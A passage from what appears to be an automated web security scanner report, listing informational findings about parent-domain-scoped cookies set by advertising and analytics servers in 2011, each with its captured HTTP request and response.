GET /v0/ad?sid=1794251&br=1&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=520&zy=233&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3A12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:19:49 GMT
Set-Cookie: ut="1%3AHY1LDoMgFADv8tYseNBS421AqZhSLJ9K0OfdS7qdmWRO2AWMJ7xsq1uaM4wwOTcskeudMPqlvEmQYVnkhISf9gyBNCGWg8Uoj9qjQSbfI7yz7K33nZhSN3qQMpJNzqu1qVvoeObfbokDA6NDsGn9D%2BG6fg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:19:49 GMT
Set-Cookie: vsd=0@1@4dbe14c5@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:19:49 GMT
Set-Cookie: fq="84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjqh1%2C826ke%2C1uo0%7Clkjqh1"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:19:49 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:19:49 GMT
Content-Length: 4307

document.write('<a class=\"adHeadline\" target=\"_top\" onmouseover=\"window.status=\'http://www.cheapezfast.com\'; return true;\" onmouseout=\"window.status=\' \'; return true;\" href=\"http://click.
...[SNIP]...

16.23. http://ads2.adbrite.com/v0/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=1794251&br=1&ifr=1&ref=about%3Ablank&zx=57&zy=158&ww=0&wh=0&fl=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads2.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; path=/; domain=.adbrite.com; expires=Mon, 09-May-2011 02:35:06 GMT
Set-Cookie: b="%3A%3A12ggb"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:35:06 GMT
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 03-May-2011 02:35:06 GMT
Set-Cookie: rb2=EAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:35:06 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMnMzawxrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:35:06 GMT
Set-Cookie: fq="876fb%2C1uo0%7Clkjr6i"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:35:06 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:35:06 GMT
Content-Length: 1630

document.write('<a class=\"adHeadline\" target=\"_top\" onmouseover=\"window.status=\'http://new-electronic-cigarette.com/ab.php\'; return true;\" onmouseout=\"window.status=\' \'; return true;\" href
...[SNIP]...

16.24. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=3005617&rn=709336356&c7=http%3A%2F%2Fwww.washingtonpost.com%2Fwl%2Fjobs%2Fhome%3Fwpsrc%3DAG0002174%26keyword%3D4846831919%26cre%3D430450907%26g%3D1%26s_kwcid%3DTC-21380-4846831919-e-430450907&c8=Washington%20DC%20Area%20Jobs%20%26%20Careers%3A%20Find%20Your%2&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 01 May 2011 23:34:41 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Tue, 30-Apr-2013 23:34:41 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


16.25. http://bdv.bidvertiser.com/bidvertiser.dbm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bdv.bidvertiser.com
Path:   /bidvertiser.dbm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bidvertiser.dbm?pid=349166&bid=862453&RD=89&DIF=2&bd_ref_v=&tref=1&win_name=null&docref=&jsrand=24578&js1loc=about%3Ablank HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bdv.bidvertiser.com

Response

HTTP/1.1 200 OK
Date: Monday, 02-May-2011 02:34:42 GMT
Cache-Control: no-store
Last-Modified: Sunday, 02-May-2010 02:34:42 GMT
Set-Cookie: bdv_c5p=214590_41999682_1; domain=.bidvertiser.com; path=/; expires=Tue, 03-May-2011 02:34:42 GMT
Set-Cookie: fre5_krp=214590_41999682_1; domain=.bidvertiser.com; path=/; expires=Mon, 09-May-2011 02:34:42 GMT
P3P: policyref="http://www.bidvertiser.com/bdv/bidvertiser/p3p.xml", CP="NOI DEV PSA PSD IVA OTP OUR OTR IND OTC"
Content-Type: text/html; charset=ISO-8859-1
Content-Len: 384
Warning: 214 "Juniper Networks DX Active"
Vary: Accept-Encoding, User-Agent
Content-Length: 384

var PUC="http://www.hyperpromote.com/tags/showaon.html?bvgeocode=US&bvlocationcode=862453&bvurl=" + encodeURI(document.location) + "&bvtitle=" + escape(document.title);
var bv_freq=21600;
var temp_s
...[SNIP]...

16.26. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=530741&ev=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=3w3v1p&rurl=http%3A%2F%2Fa.triggit.com%2Fpxcwcm HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|530741.c1e1301e-3a1f-4ca7-9870-f636b5f10e66.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 26-Apr-2012 02:01:51 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|530741.c1e1301e-3a1f-4ca7-9870-f636b5f10e66.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 01-May-2012 02:01:51 GMT; Path=/
Location: http://a.triggit.com/pxcwcm
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Mon, 02 May 2011 02:01:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


16.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2193540&PluID=0&w=160&h=600&64cd0da313&ncu=http://d1.openx.org/ck.php?oaparams=2__bannerid=522976__zoneid=0__OXLCA=1__cb=64cd0da313__r_id=85dbdb9e09296233a4d7b328928878f8__r_ts=lkjpfk__oadest=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D%3Bcb%3D1442324580http%253A%252F%252Fwww.zipcar.com%252Fwebchi3col75&ucm=true&ncu=$$%c$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; A3=iQQIaFx503Dk00000iKhqaHW208A300001jj9MaH17066N00001iZLfaFB607pd00001j0InaHlY09sO00001j4HbaE.a0a9y00001jGDhaHW50d8900000jcM0aFSa04m400000eDVwaDPh084o00001gY2paFS+09nl00003jGDjaHWf0d8900000hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002jGaZaHWf0d8900004johvaFxN07uh00002h52YaGZy0ca700001hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWe07aw00001jFY.aHqe0d8900001j2VdaGyd07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001jv+zaH1o0d8900002jFZhaHWf0d8900000jAtnaHq602WG00001iBU1aEBz0aVU000019rW0aFGt04uw00001; B3=9yE10000000000up7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh85Yh0000000001un9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj9yMi0000000000up8Wi10000000001un93M20000000001uf82Np0000000001um9ufH0000000002um99ex0000000001um9yMk0000000000up9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud8Zxy0000000001up9qqo0000000002ui9yDd0000000001un78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh9xwn0000000004up7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000j0InaHlY09sO00001iZLfaFB607pd00001jj9MaH17066N00001iKhqaHW208A300001jGDhaHW50d8900000j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000jGDjaHWf0d8900000gY2paFS+09nl00003hH4jaFhv09wy00001hEIkaItM0bI400001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000jGaZaHWf0d8900004h52YaGZy0ca700001johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWe07aw00001jeoLaF6J07Hs00001jFY.aHqe0d8900001j8QYaEBz07LU00001j2VdaGyd07aw00001jv+zaH1o0d8900002hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001jAtnaHq602WG00001jFZhaHWf0d8900000; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9yE10000000000up8Dka0000000001uh9cTR0000000001uf85Yh0000000001un52BU0000000001ui9abz0000000000ui9yMi0000000000up9eB50000000001uj8TfJ0000000001uh9fJa0000000001ul8ny40000000001uq9ufH0000000002um82Np0000000001um93M20000000001uf8Wi10000000001un9yMk0000000000up99ex0000000001um9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9yDd0000000001un9qqo0000000002ui8Zxy0000000001up9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui9xwn0000000004up; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 02:08:15 GMT
Connection: close
Content-Length: 1831

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

16.28. http://c.bing.com/c.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Host: c.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15074&RedC=c.bing.com&MXFR=B506C07761D7465D924574124E3C14DF
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF&TUID=1; domain=.bing.com; expires=Thu, 17-Nov-2011 23:32:33 GMT; path=/;
Date: Sun, 01 May 2011 23:32:32 GMT
Content-Length: 0


16.29. http://c.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=6811643&resolution=1920&h=1200&camefrom=&u=http%3A//bizinformation.co/www.onlinemicrofiche.com&t=www.Onlinemicrofiche.com&java=1&security=0e4e73f2&sc_random=0.7098396345973015&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique_1=sc6761715.1303907356.0; is_unique=sc2226915.1303083753.0-1656416.1303217091.0-6426596.1303907356.0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc2226915.1303083753.0-1656416.1303217091.0-6426596.1303907356.0-6811643.1304302344.0; expires=Sat, 30-Apr-2016 02:12:24 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

16.30. http://clk.atdmt.com/CNT/go/319741851/direct/01/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /CNT/go/319741851/direct/01/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/319741851/direct/01/ HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:fb75/120af:e2ff/25d1:d2ca/12b1e; expires=Tuesday, 30-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484:cbb7115/12b1e/130edf9b/d2ca/4dbdeda3; expires=Tuesday, 30-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sun, 01 May 2011 23:32:51 GMT
Connection: close


16.31. http://csc.beap.ad.yieldmanager.net/i

Summary

Severity:   Information
Confidence:   Certain
Host:   http://csc.beap.ad.yieldmanager.net
Path:   /i

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i?bv=1.0.0&bs=(12843fkhk(gid$BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt,st$1304292783218678,v$1.0))&t=J-D&al=(as$12c6r0iom,aid$iFueFUwN7y4-,bi$589320551,ct$25,at$H)&s=0&r=0.17090801848098636&SIG=10v2lvu5s;x-cookie=8xuw7w56dzwfu&o=4&f=qx HTTP/1.1
Host: csc.beap.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=110

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=120;path=/; expires=Tue, 01-May-2013 20:00:00 GMT;domain=.yieldmanager.net
Set-Cookie: S=s=4c2m2vh6rrrg2&t=1304292866;path=/; expires=
Cache-Control: no-cache, private
Accept-Charset: utf-8
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

16.32. http://ib.adnxs.com/getuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://loadm.exelator.com/load/?p=204&g=011&bi=$UID&j=0 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9pYi5hZG54cy5jb20vZ2V0dWlkP2h0dHA6Ly9sb2FkbS5leGVsYXRvci5jb20vbG9hZC8%2FcD0yMDQmZz0wMTEmYmk9JFVJRCZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPg%3D%3D&h=f1ffe0dba83264310d05134a36461417
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
